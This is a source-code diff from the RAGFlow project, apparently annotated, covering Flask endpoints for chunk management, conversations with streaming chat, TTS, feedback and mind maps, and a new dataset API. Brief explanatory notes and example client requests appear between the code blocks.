        if not ELASTICSEARCH.upsert([{"id": i, "available_int": int(req["available_int"])} for i in req["chunk_ids"]],
                                    search.index_name(tenant_id)):
            return get_data_error_result(retmsg="Index updating failure")
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)


@manager.route('/rm', methods=['POST'])
@login_required
@validate_request("chunk_ids", "doc_id")
def rm():
    req = request.json
    try:
        if not ELASTICSEARCH.deleteByQuery(
                Q("ids", values=req["chunk_ids"]), search.index_name(current_user.id)):
            return get_data_error_result(retmsg="Index updating failure")
        e, doc = DocumentService.get_by_id(req["doc_id"])
        if not e:
            return get_data_error_result(retmsg="Document not found!")
        deleted_chunk_ids = req["chunk_ids"]
        chunk_number = len(deleted_chunk_ids)
        DocumentService.decrement_chunk_num(doc.id, doc.kb_id, 1, chunk_number, 0)
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)


@manager.route('/create', methods=['POST'])
@login_required
@validate_request("doc_id", "content_with_weight")
def create():
    req = request.json
    md5 = hashlib.md5()
    md5.update((req["content_with_weight"] + req["doc_id"]).encode("utf-8"))
    chunck_id = md5.hexdigest()
    d = {"id": chunck_id, "content_ltks": rag_tokenizer.tokenize(req["content_with_weight"]),
         "content_with_weight": req["content_with_weight"]}
    d["content_sm_ltks"] = rag_tokenizer.fine_grained_tokenize(d["content_ltks"])
    d["important_kwd"] = req.get("important_kwd", [])
    d["important_tks"] = rag_tokenizer.tokenize(" ".join(req.get("important_kwd", [])))
    d["create_time"] = str(datetime.datetime.now()).replace("T", " ")[:19]
    d["create_timestamp_flt"] = datetime.datetime.now().timestamp()

    try:
        e, doc = DocumentService.get_by_id(req["doc_id"])
        if not e:
            return get_data_error_result(retmsg="Document not found!")
        d["kb_id"] = [doc.kb_id]
        d["docnm_kwd"] = doc.name
        d["doc_id"] = doc.id

        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
        if not tenant_id:
            return get_data_error_result(retmsg="Tenant not found!")

        embd_id = DocumentService.get_embd_id(req["doc_id"])
        embd_mdl = TenantLLMService.model_instance(
            tenant_id, LLMType.EMBEDDING.value, embd_id)

        v, c = embd_mdl.encode([doc.name, req["content_with_weight"]])
        v = 0.1 * v[0] + 0.9 * v[1]
        d["q_%d_vec" % len(v)] = v.tolist()
        ELASTICSEARCH.upsert([d], search.index_name(tenant_id))

        DocumentService.increment_chunk_num(
            doc.id, doc.kb_id, c, 1, 0)
        return get_json_result(data={"chunk_id": chunck_id})
    except Exception as e:
        return server_error_response(e)

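create() derives the chunk id deterministically, an md5 over the chunk text concatenated with the document id, so re-posting identical content into the same document upserts the existing Elasticsearch entry rather than adding a duplicate. A standalone sketch of the recipe:

import hashlib

def chunk_id(content_with_weight, doc_id):
    # Same recipe as the endpoint: md5 over content + doc_id, hex-encoded.
    md5 = hashlib.md5()
    md5.update((content_with_weight + doc_id).encode("utf-8"))
    return md5.hexdigest()

# Identical input gives an identical id, so the ES upsert overwrites.
assert chunk_id("hello", "doc1") == chunk_id("hello", "doc1")
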
@manager.route('/retrieval_test', methods=['POST'])
@login_required
@validate_request("kb_id", "question")
def retrieval_test():
    req = request.json
    page = int(req.get("page", 1))
    size = int(req.get("size", 30))
    question = req["question"]
    kb_id = req["kb_id"]
    if isinstance(kb_id, str):
        kb_id = [kb_id]
    doc_ids = req.get("doc_ids", [])
    similarity_threshold = float(req.get("similarity_threshold", 0.0))
    vector_similarity_weight = float(req.get("vector_similarity_weight", 0.3))
    top = int(req.get("top_k", 1024))

    try:
        tenants = UserTenantService.query(user_id=current_user.id)
        for kid in kb_id:
            for tenant in tenants:
                if KnowledgebaseService.query(
                        tenant_id=tenant.tenant_id, id=kid):
                    break
            else:
                return get_json_result(
                    data=False, retmsg=f'Only owner of knowledgebase authorized for this operation.',
                    retcode=RetCode.OPERATING_ERROR)

        e, kb = KnowledgebaseService.get_by_id(kb_id[0])
        if not e:
            return get_data_error_result(retmsg="Knowledgebase not found!")

        embd_mdl = TenantLLMService.model_instance(
            kb.tenant_id, LLMType.EMBEDDING.value, llm_name=kb.embd_id)

        rerank_mdl = None
        if req.get("rerank_id"):
            rerank_mdl = TenantLLMService.model_instance(
                kb.tenant_id, LLMType.RERANK.value, llm_name=req["rerank_id"])

        if req.get("keyword", False):
            chat_mdl = TenantLLMService.model_instance(kb.tenant_id, LLMType.CHAT)
            question += keyword_extraction(chat_mdl, question)

        retr = retrievaler if kb.parser_id != ParserType.KG else kg_retrievaler
        ranks = retr.retrieval(question, embd_mdl, kb.tenant_id, kb_id, page, size,
                               similarity_threshold, vector_similarity_weight, top,
                               doc_ids, rerank_mdl=rerank_mdl, highlight=req.get("highlight"))
        for c in ranks["chunks"]:
            if "vector" in c:
                del c["vector"]

        return get_json_result(data=ranks)
    except Exception as e:
        if str(e).find("not_found") > 0:
            return get_json_result(data=False, retmsg=f'No chunk found! Check the chunk status please!',
                                   retcode=RetCode.DATA_ERROR)
        return server_error_response(e)

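retrieval_test accepts either a single knowledgebase id or a list, and can optionally rerank with a dedicated model and expand the query with LLM-extracted keywords. A hedged request sketch; the host, the /v1/chunk prefix, the cookie name, and the placeholder ids are assumptions:

import requests

payload = {
    "kb_id": ["<kb-id>"],        # a bare string is accepted too
    "question": "How is the chunk vector built?",
    "page": 1, "size": 30,
    "similarity_threshold": 0.2,
    "vector_similarity_weight": 0.3,
    "top_k": 1024,
    "keyword": False,            # True expands the query via keyword_extraction
    "highlight": True,
}
r = requests.post("http://localhost:9380/v1/chunk/retrieval_test",
                  json=payload, cookies={"session": "<login-cookie>"})
print(r.json()["data"]["chunks"][0]["content_with_weight"])
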
@manager.route('/knowledge_graph', methods=['GET'])
@login_required
def knowledge_graph():
    doc_id = request.args["doc_id"]
    req = {
        "doc_ids": [doc_id],
        "knowledge_graph_kwd": ["graph", "mind_map"]
    }
    tenant_id = DocumentService.get_tenant_id(doc_id)
    sres = retrievaler.search(req, search.index_name(tenant_id))
    obj = {"graph": {}, "mind_map": {}}
    for id in sres.ids[:2]:
        ty = sres.field[id]["knowledge_graph_kwd"]
        try:
            obj[ty] = json.loads(sres.field[id]["content_with_weight"])
        except Exception as e:
            print(traceback.format_exc(), flush=True)

    return get_json_result(data=obj)


@@ -1,174 +1,376 @@

(file before the change, 174 lines:)

#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from flask import request, Response, jsonify
from flask_login import login_required
from api.db.services.dialog_service import DialogService, ConversationService, chat
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.utils import get_uuid
from api.utils.api_utils import get_json_result
import json


@manager.route('/set', methods=['POST'])
@login_required
def set_conversation():
    req = request.json
    conv_id = req.get("conversation_id")
    if conv_id:
        del req["conversation_id"]
        try:
            if not ConversationService.update_by_id(conv_id, req):
                return get_data_error_result(retmsg="Conversation not found!")
            e, conv = ConversationService.get_by_id(conv_id)
            if not e:
                return get_data_error_result(
                    retmsg="Fail to update a conversation!")
            conv = conv.to_dict()
            return get_json_result(data=conv)
        except Exception as e:
            return server_error_response(e)

    try:
        e, dia = DialogService.get_by_id(req["dialog_id"])
        if not e:
            return get_data_error_result(retmsg="Dialog not found")
        conv = {
            "id": get_uuid(),
            "dialog_id": req["dialog_id"],
            "name": req.get("name", "New conversation"),
            "message": [{"role": "assistant", "content": dia.prompt_config["prologue"]}]
        }
        ConversationService.save(**conv)
        e, conv = ConversationService.get_by_id(conv["id"])
        if not e:
            return get_data_error_result(retmsg="Fail to new a conversation!")
        conv = conv.to_dict()
        return get_json_result(data=conv)
    except Exception as e:
        return server_error_response(e)


@manager.route('/get', methods=['GET'])
@login_required
def get():
    conv_id = request.args["conversation_id"]
    try:
        e, conv = ConversationService.get_by_id(conv_id)
        if not e:
            return get_data_error_result(retmsg="Conversation not found!")
        conv = conv.to_dict()
        return get_json_result(data=conv)
    except Exception as e:
        return server_error_response(e)


@manager.route('/rm', methods=['POST'])
@login_required
def rm():
    conv_ids = request.json["conversation_ids"]
    try:
        for cid in conv_ids:
            ConversationService.delete_by_id(cid)
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)


@manager.route('/list', methods=['GET'])
@login_required
def list_convsersation():
    dialog_id = request.args["dialog_id"]
    try:
        convs = ConversationService.query(
            dialog_id=dialog_id,
            order_by=ConversationService.model.create_time,
            reverse=True)
        convs = [d.to_dict() for d in convs]
        return get_json_result(data=convs)
    except Exception as e:
        return server_error_response(e)


@manager.route('/completion', methods=['POST'])
@login_required
#@validate_request("conversation_id", "messages")
def completion():
    req = request.json
    #req = {"conversation_id": "9aaaca4c11d311efa461fa163e197198", "messages": [
    #    {"role": "user", "content": "上海有吗?"}  # zh: "Is there one in Shanghai?"
    #]}
    msg = []
    for m in req["messages"]:
        if m["role"] == "system":
            continue
        if m["role"] == "assistant" and not msg:
            continue
        msg.append({"role": m["role"], "content": m["content"]})
    try:
        e, conv = ConversationService.get_by_id(req["conversation_id"])
        if not e:
            return get_data_error_result(retmsg="Conversation not found!")
        conv.message.append(msg[-1])
        e, dia = DialogService.get_by_id(conv.dialog_id)
        if not e:
            return get_data_error_result(retmsg="Dialog not found!")
        del req["conversation_id"]
        del req["messages"]

        if not conv.reference:
            conv.reference = []
        conv.message.append({"role": "assistant", "content": ""})
        conv.reference.append({"chunks": [], "doc_aggs": []})

        def fillin_conv(ans):
            nonlocal conv
            if not conv.reference:
                conv.reference.append(ans["reference"])
            else:
                conv.reference[-1] = ans["reference"]
            conv.message[-1] = {"role": "assistant", "content": ans["answer"]}

        def stream():
            nonlocal dia, msg, req, conv
            try:
                for ans in chat(dia, msg, True, **req):
                    fillin_conv(ans)
                    yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
                ConversationService.update_by_id(conv.id, conv.to_dict())
            except Exception as e:
                yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
                                            "data": {"answer": "**ERROR**: " + str(e), "reference": []}},
                                           ensure_ascii=False) + "\n\n"
            yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": True}, ensure_ascii=False) + "\n\n"

        if req.get("stream", True):
            resp = Response(stream(), mimetype="text/event-stream")
            resp.headers.add_header("Cache-control", "no-cache")
            resp.headers.add_header("Connection", "keep-alive")
            resp.headers.add_header("X-Accel-Buffering", "no")
            resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
            return resp

        else:
            answer = None
            for ans in chat(dia, msg, **req):
                answer = ans
                fillin_conv(ans)
                ConversationService.update_by_id(conv.id, conv.to_dict())
                break
            return get_json_result(data=answer)
    except Exception as e:
        return server_error_response(e)

(file after the change, 376 lines:)

#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import re
import traceback
from copy import deepcopy
from api.db.services.user_service import UserTenantService
from flask import request, Response
from flask_login import login_required, current_user

from api.db import LLMType
from api.db.services.dialog_service import DialogService, ConversationService, chat, ask
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import LLMBundle, TenantService, TenantLLMService
from api.settings import RetCode, retrievaler
from api.utils import get_uuid
from api.utils.api_utils import get_json_result
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from graphrag.mind_map_extractor import MindMapExtractor


@manager.route('/set', methods=['POST'])
@login_required
def set_conversation():
    req = request.json
    conv_id = req.get("conversation_id")
    if conv_id:
        del req["conversation_id"]
        try:
            if not ConversationService.update_by_id(conv_id, req):
                return get_data_error_result(retmsg="Conversation not found!")
            e, conv = ConversationService.get_by_id(conv_id)
            if not e:
                return get_data_error_result(
                    retmsg="Fail to update a conversation!")
            conv = conv.to_dict()
            return get_json_result(data=conv)
        except Exception as e:
            return server_error_response(e)

    try:
        e, dia = DialogService.get_by_id(req["dialog_id"])
        if not e:
            return get_data_error_result(retmsg="Dialog not found")
        conv = {
            "id": get_uuid(),
            "dialog_id": req["dialog_id"],
            "name": req.get("name", "New conversation"),
            "message": [{"role": "assistant", "content": dia.prompt_config["prologue"]}]
        }
        ConversationService.save(**conv)
        e, conv = ConversationService.get_by_id(conv["id"])
        if not e:
            return get_data_error_result(retmsg="Fail to new a conversation!")
        conv = conv.to_dict()
        return get_json_result(data=conv)
    except Exception as e:
        return server_error_response(e)


@manager.route('/get', methods=['GET'])
@login_required
def get():
    conv_id = request.args["conversation_id"]
    try:
        e, conv = ConversationService.get_by_id(conv_id)
        if not e:
            return get_data_error_result(retmsg="Conversation not found!")
        tenants = UserTenantService.query(user_id=current_user.id)
        for tenant in tenants:
            if DialogService.query(tenant_id=tenant.tenant_id, id=conv.dialog_id):
                break
        else:
            return get_json_result(
                data=False, retmsg=f'Only owner of conversation authorized for this operation.',
                retcode=RetCode.OPERATING_ERROR)
        conv = conv.to_dict()
        return get_json_result(data=conv)
    except Exception as e:
        return server_error_response(e)


@manager.route('/rm', methods=['POST'])
@login_required
def rm():
    conv_ids = request.json["conversation_ids"]
    try:
        for cid in conv_ids:
            exist, conv = ConversationService.get_by_id(cid)
            if not exist:
                return get_data_error_result(retmsg="Conversation not found!")
            tenants = UserTenantService.query(user_id=current_user.id)
            for tenant in tenants:
                if DialogService.query(tenant_id=tenant.tenant_id, id=conv.dialog_id):
                    break
            else:
                return get_json_result(
                    data=False, retmsg=f'Only owner of conversation authorized for this operation.',
                    retcode=RetCode.OPERATING_ERROR)
            ConversationService.delete_by_id(cid)
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)


@manager.route('/list', methods=['GET'])
@login_required
def list_convsersation():
    dialog_id = request.args["dialog_id"]
    try:
        if not DialogService.query(tenant_id=current_user.id, id=dialog_id):
            return get_json_result(
                data=False, retmsg=f'Only owner of dialog authorized for this operation.',
                retcode=RetCode.OPERATING_ERROR)
        convs = ConversationService.query(
            dialog_id=dialog_id,
            order_by=ConversationService.model.create_time,
            reverse=True)
        convs = [d.to_dict() for d in convs]
        return get_json_result(data=convs)
    except Exception as e:
        return server_error_response(e)


@manager.route('/completion', methods=['POST'])
@login_required
@validate_request("conversation_id", "messages")
def completion():
    req = request.json
    # req = {"conversation_id": "9aaaca4c11d311efa461fa163e197198", "messages": [
    #     {"role": "user", "content": "上海有吗?"}  # zh: "Is there one in Shanghai?"
    # ]}
    msg = []
    for m in req["messages"]:
        if m["role"] == "system":
            continue
        if m["role"] == "assistant" and not msg:
            continue
        msg.append(m)
    message_id = msg[-1].get("id")
    try:
        e, conv = ConversationService.get_by_id(req["conversation_id"])
        if not e:
            return get_data_error_result(retmsg="Conversation not found!")
        conv.message = deepcopy(req["messages"])
        e, dia = DialogService.get_by_id(conv.dialog_id)
        if not e:
            return get_data_error_result(retmsg="Dialog not found!")
        del req["conversation_id"]
        del req["messages"]

        if not conv.reference:
            conv.reference = []
        conv.message.append({"role": "assistant", "content": "", "id": message_id})
        conv.reference.append({"chunks": [], "doc_aggs": []})

        def fillin_conv(ans):
            nonlocal conv, message_id
            if not conv.reference:
                conv.reference.append(ans["reference"])
            else:
                conv.reference[-1] = ans["reference"]
            conv.message[-1] = {"role": "assistant", "content": ans["answer"],
                                "id": message_id, "prompt": ans.get("prompt", "")}
            ans["id"] = message_id

        def stream():
            nonlocal dia, msg, req, conv
            try:
                for ans in chat(dia, msg, True, **req):
                    fillin_conv(ans)
                    yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
                ConversationService.update_by_id(conv.id, conv.to_dict())
            except Exception as e:
                yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
                                            "data": {"answer": "**ERROR**: " + str(e), "reference": []}},
                                           ensure_ascii=False) + "\n\n"
            yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": True}, ensure_ascii=False) + "\n\n"

        if req.get("stream", True):
            resp = Response(stream(), mimetype="text/event-stream")
            resp.headers.add_header("Cache-control", "no-cache")
            resp.headers.add_header("Connection", "keep-alive")
            resp.headers.add_header("X-Accel-Buffering", "no")
            resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
            return resp

        else:
            answer = None
            for ans in chat(dia, msg, **req):
                answer = ans
                fillin_conv(ans)
                ConversationService.update_by_id(conv.id, conv.to_dict())
                break
            return get_json_result(data=answer)
    except Exception as e:
        return server_error_response(e)

@manager.route('/tts', methods=['POST'])
@login_required
def tts():
    req = request.json
    text = req["text"]

    tenants = TenantService.get_by_user_id(current_user.id)
    if not tenants:
        return get_data_error_result(retmsg="Tenant not found!")

    tts_id = tenants[0]["tts_id"]
    if not tts_id:
        return get_data_error_result(retmsg="No default TTS model is set")

    tts_mdl = LLMBundle(tenants[0]["tenant_id"], LLMType.TTS, tts_id)

    def stream_audio():
        try:
            for chunk in tts_mdl.tts(text):
                yield chunk
        except Exception as e:
            yield ("data:" + json.dumps({"retcode": 500, "retmsg": str(e),
                                         "data": {"answer": "**ERROR**: " + str(e)}},
                                        ensure_ascii=False)).encode('utf-8')

    resp = Response(stream_audio(), mimetype="audio/mpeg")
    resp.headers.add_header("Cache-Control", "no-cache")
    resp.headers.add_header("Connection", "keep-alive")
    resp.headers.add_header("X-Accel-Buffering", "no")

    return resp

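The /tts endpoint streams raw MPEG audio frames, and an error in the middle of the stream arrives as a UTF-8 encoded JSON blob rather than audio. A minimal caller sketch; the host, the /v1/conversation prefix, and the cookie name are assumptions:

import requests

r = requests.post("http://localhost:9380/v1/conversation/tts",
                  json={"text": "Hello from RAGFlow"},
                  cookies={"session": "<login-cookie>"}, stream=True)
with open("answer.mp3", "wb") as f:
    for chunk in r.iter_content(chunk_size=8192):
        f.write(chunk)  # a mid-stream error would be written here as JSON bytes
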
@manager.route('/delete_msg', methods=['POST'])
@login_required
@validate_request("conversation_id", "message_id")
def delete_msg():
    req = request.json
    e, conv = ConversationService.get_by_id(req["conversation_id"])
    if not e:
        return get_data_error_result(retmsg="Conversation not found!")

    conv = conv.to_dict()
    for i, msg in enumerate(conv["message"]):
        if req["message_id"] != msg.get("id", ""):
            continue
        assert conv["message"][i + 1]["id"] == req["message_id"]
        conv["message"].pop(i)
        conv["message"].pop(i)
        conv["reference"].pop(max(0, i // 2 - 1))
        break

    ConversationService.update_by_id(conv["id"], conv)
    return get_json_result(data=conv)

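delete_msg relies on the message layout maintained by completion(): the user turn and the assistant reply of one round share a single id and sit next to each other, with the id-less prologue at index 0, so a round's reference lives at index i // 2 - 1, clamped to 0. A small illustration of the invariant, with made-up messages:

# Illustration of the pairing delete_msg assumes:
# [prologue, user_1, assistant_1, user_2, assistant_2, ...]
messages = [
    {"role": "assistant", "content": "prologue"},        # index 0, no id
    {"role": "user", "content": "q1", "id": "m1"},       # index 1
    {"role": "assistant", "content": "a1", "id": "m1"},  # index 2
]
i = 1                                  # first entry whose id matches "m1"
assert messages[i + 1]["id"] == "m1"   # the same check the endpoint asserts
ref_index = max(0, i // 2 - 1)         # 0: the round's slot in conv["reference"]
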
@manager.route('/thumbup', methods=['POST'])
@login_required
@validate_request("conversation_id", "message_id")
def thumbup():
    req = request.json
    e, conv = ConversationService.get_by_id(req["conversation_id"])
    if not e:
        return get_data_error_result(retmsg="Conversation not found!")
    up_down = req.get("set")
    feedback = req.get("feedback", "")
    conv = conv.to_dict()
    for i, msg in enumerate(conv["message"]):
        if req["message_id"] == msg.get("id", "") and msg.get("role", "") == "assistant":
            if up_down:
                msg["thumbup"] = True
                if "feedback" in msg:
                    del msg["feedback"]
            else:
                msg["thumbup"] = False
                if feedback:
                    msg["feedback"] = feedback
            break

    ConversationService.update_by_id(conv["id"], conv)
    return get_json_result(data=conv)


@manager.route('/ask', methods=['POST'])
@login_required
@validate_request("question", "kb_ids")
def ask_about():
    req = request.json
    uid = current_user.id

    def stream():
        nonlocal req, uid
        try:
            for ans in ask(req["question"], req["kb_ids"], uid):
                yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
        except Exception as e:
            yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
                                        "data": {"answer": "**ERROR**: " + str(e), "reference": []}},
                                       ensure_ascii=False) + "\n\n"
        yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": True}, ensure_ascii=False) + "\n\n"

    resp = Response(stream(), mimetype="text/event-stream")
    resp.headers.add_header("Cache-control", "no-cache")
    resp.headers.add_header("Connection", "keep-alive")
    resp.headers.add_header("X-Accel-Buffering", "no")
    resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
    return resp


@manager.route('/mindmap', methods=['POST'])
@login_required
@validate_request("question", "kb_ids")
def mindmap():
    req = request.json
    kb_ids = req["kb_ids"]
    e, kb = KnowledgebaseService.get_by_id(kb_ids[0])
    if not e:
        return get_data_error_result(retmsg="Knowledgebase not found!")

    embd_mdl = TenantLLMService.model_instance(
        kb.tenant_id, LLMType.EMBEDDING.value, llm_name=kb.embd_id)
    chat_mdl = LLMBundle(current_user.id, LLMType.CHAT)
    ranks = retrievaler.retrieval(req["question"], embd_mdl, kb.tenant_id, kb_ids, 1, 12,
                                  0.3, 0.3, aggs=False)
    mindmap = MindMapExtractor(chat_mdl)
    mind_map = mindmap([c["content_with_weight"] for c in ranks["chunks"]]).output
    if "error" in mind_map:
        return server_error_response(Exception(mind_map["error"]))
    return get_json_result(data=mind_map)


@manager.route('/related_questions', methods=['POST'])
@login_required
@validate_request("question")
def related_questions():
    req = request.json
    question = req["question"]
    chat_mdl = LLMBundle(current_user.id, LLMType.CHAT)
    prompt = """
Objective: To generate search terms related to the user's search keywords, helping users find more valuable information.
Instructions:
 - Based on the keywords provided by the user, generate 5-10 related search terms.
 - Each search term should be directly or indirectly related to the keyword, guiding the user to find more valuable information.
 - Use common, general terms as much as possible, avoiding obscure words or technical jargon.
 - Keep the term length between 2-4 words, concise and clear.
 - DO NOT translate, use the language of the original keywords.

### Example:
Keywords: Chinese football
Related search terms:
1. Current status of Chinese football
2. Reform of Chinese football
3. Youth training of Chinese football
4. Chinese football in the Asian Cup
5. Chinese football in the World Cup

Reason:
 - When searching, users often only use one or two keywords, making it difficult to fully express their information needs.
 - Generating related search terms can help users dig deeper into relevant information and improve search efficiency.
 - At the same time, related terms can also help search engines better understand user needs and return more accurate search results.
"""
    ans = chat_mdl.chat(prompt, [{"role": "user", "content": f"""
Keywords: {question}
Related search terms:
"""}], {"temperature": 0.9})
    return get_json_result(data=[re.sub(r"^[0-9]\. ", "", a) for a in ans.split("\n") if re.match(r"^[0-9]\. ", a)])


api/apps/dataset_api.py (new file, 878 lines)
@@ -0,0 +1,878 @@

#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pathlib
import re
import warnings
from functools import partial
from io import BytesIO

from elasticsearch_dsl import Q
from flask import request, send_file
from flask_login import login_required, current_user
from httpx import HTTPError

from api.contants import NAME_LENGTH_LIMIT
from api.db import FileType, ParserType, FileSource, TaskStatus
from api.db import StatusEnum
from api.db.db_models import File
from api.db.services import duplicate_name
from api.db.services.document_service import DocumentService
from api.db.services.file2document_service import File2DocumentService
from api.db.services.file_service import FileService
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.user_service import TenantService
from api.settings import RetCode
from api.utils import get_uuid
from api.utils.api_utils import construct_json_result, construct_error_response
from api.utils.api_utils import construct_result, validate_request
from api.utils.file_utils import filename_type, thumbnail
from rag.app import book, laws, manual, naive, one, paper, presentation, qa, resume, table, picture, audio, email
from rag.nlp import search
from rag.utils.es_conn import ELASTICSEARCH
from rag.utils.storage_factory import STORAGE_IMPL

MAXIMUM_OF_UPLOADING_FILES = 256


# ------------------------------ create a dataset ---------------------------------------

@manager.route("/", methods=["POST"])
@login_required  # requires a logged-in user
@validate_request("name")  # checks that the "name" key is present
def create_dataset():
    # Check if the Authorization header is present
    authorization_token = request.headers.get("Authorization")
    if not authorization_token:
        return construct_json_result(code=RetCode.AUTHENTICATION_ERROR, message="Authorization header is missing.")

    # TODO: Login or API key
    # objs = APIToken.query(token=authorization_token)
    #
    # # Authorization error
    # if not objs:
    #     return construct_json_result(code=RetCode.AUTHENTICATION_ERROR, message="Token is invalid.")
    #
    # tenant_id = objs[0].tenant_id

    tenant_id = current_user.id
    request_body = request.json

    # In case there is no name
    if "name" not in request_body:
        return construct_json_result(code=RetCode.DATA_ERROR, message="Expected 'name' field in request body")

    dataset_name = request_body["name"]

    # empty dataset_name
    if not dataset_name:
        return construct_json_result(code=RetCode.DATA_ERROR, message="Empty dataset name")

    # In case there is whitespace at the head or the tail
    dataset_name = dataset_name.strip()

    # In case the length of the name exceeds the limit
    dataset_name_length = len(dataset_name)
    if dataset_name_length > NAME_LENGTH_LIMIT:
        return construct_json_result(
            code=RetCode.DATA_ERROR,
            message=f"Dataset name: {dataset_name} with length {dataset_name_length} exceeds {NAME_LENGTH_LIMIT}!")

    # In case there are other fields in the data-binary
    if len(request_body.keys()) > 1:
        name_list = []
        for key_name in request_body.keys():
            if key_name != "name":
                name_list.append(key_name)
        return construct_json_result(code=RetCode.DATA_ERROR,
                                     message=f"fields: {name_list}, are not allowed in request body.")

    # If there is a duplicate name, modify it to make it unique
    request_body["name"] = duplicate_name(
        KnowledgebaseService.query,
        name=dataset_name,
        tenant_id=tenant_id,
        status=StatusEnum.VALID.value)
    try:
        request_body["id"] = get_uuid()
        request_body["tenant_id"] = tenant_id
        request_body["created_by"] = tenant_id
        exist, t = TenantService.get_by_id(tenant_id)
        if not exist:
            return construct_result(code=RetCode.AUTHENTICATION_ERROR, message="Tenant not found.")
        request_body["embd_id"] = t.embd_id
        if not KnowledgebaseService.save(**request_body):
            # failed to create the new dataset
            return construct_result()
        return construct_json_result(code=RetCode.SUCCESS,
                                     data={"dataset_name": request_body["name"], "dataset_id": request_body["id"]})
    except Exception as e:
        return construct_error_response(e)

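create_dataset is strict about its input: the JSON body may contain only "name", and the Authorization header is merely checked for presence while real token validation is still a TODO. A hedged request sketch; the host, the /v1/dataset prefix, the cookie name, and the response shape noted in the comment are assumptions:

import requests

r = requests.post("http://localhost:9380/v1/dataset/",
                  headers={"Authorization": "<any-non-empty-value-for-now>"},
                  cookies={"session": "<login-cookie>"},
                  json={"name": "my_dataset"})  # extra keys are rejected
print(r.json())  # assumed shape: {"code": 0, "data": {"dataset_id": ...}, ...}
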
||||
|
||||
# -----------------------------list datasets-------------------------------------------------------
|
||||
|
||||
@manager.route("/", methods=["GET"])
|
||||
@login_required
|
||||
def list_datasets():
|
||||
offset = request.args.get("offset", 0)
|
||||
count = request.args.get("count", -1)
|
||||
orderby = request.args.get("orderby", "create_time")
|
||||
desc = request.args.get("desc", True)
|
||||
try:
|
||||
tenants = TenantService.get_joined_tenants_by_user_id(current_user.id)
|
||||
datasets = KnowledgebaseService.get_by_tenant_ids_by_offset(
|
||||
[m["tenant_id"] for m in tenants], current_user.id, int(offset), int(count), orderby, desc)
|
||||
return construct_json_result(data=datasets, code=RetCode.SUCCESS, message=f"List datasets successfully!")
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
except HTTPError as http_err:
|
||||
return construct_json_result(http_err)
|
||||
|
||||
|
||||
# ---------------------------------delete a dataset ----------------------------
|
||||
|
||||
@manager.route("/<dataset_id>", methods=["DELETE"])
|
||||
@login_required
|
||||
def remove_dataset(dataset_id):
|
||||
try:
|
||||
datasets = KnowledgebaseService.query(created_by=current_user.id, id=dataset_id)
|
||||
|
||||
# according to the id, searching for the dataset
|
||||
if not datasets:
|
||||
return construct_json_result(message=f"The dataset cannot be found for your current account.",
|
||||
code=RetCode.OPERATING_ERROR)
|
||||
|
||||
# Iterating the documents inside the dataset
|
||||
for doc in DocumentService.query(kb_id=dataset_id):
|
||||
if not DocumentService.remove_document(doc, datasets[0].tenant_id):
|
||||
# the process of deleting failed
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message="There was an error during the document removal process. "
|
||||
"Please check the status of the RAGFlow server and try the removal again.")
|
||||
# delete the other files
|
||||
f2d = File2DocumentService.get_by_document_id(doc.id)
|
||||
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
|
||||
File2DocumentService.delete_by_document_id(doc.id)
|
||||
|
||||
# delete the dataset
|
||||
if not KnowledgebaseService.delete_by_id(dataset_id):
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message="There was an error during the dataset removal process. "
|
||||
"Please check the status of the RAGFlow server and try the removal again.")
|
||||
# success
|
||||
return construct_json_result(code=RetCode.SUCCESS, message=f"Remove dataset: {dataset_id} successfully")
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
|
||||
# ------------------------------ get details of a dataset ----------------------------------------
|
||||
|
||||
@manager.route("/<dataset_id>", methods=["GET"])
|
||||
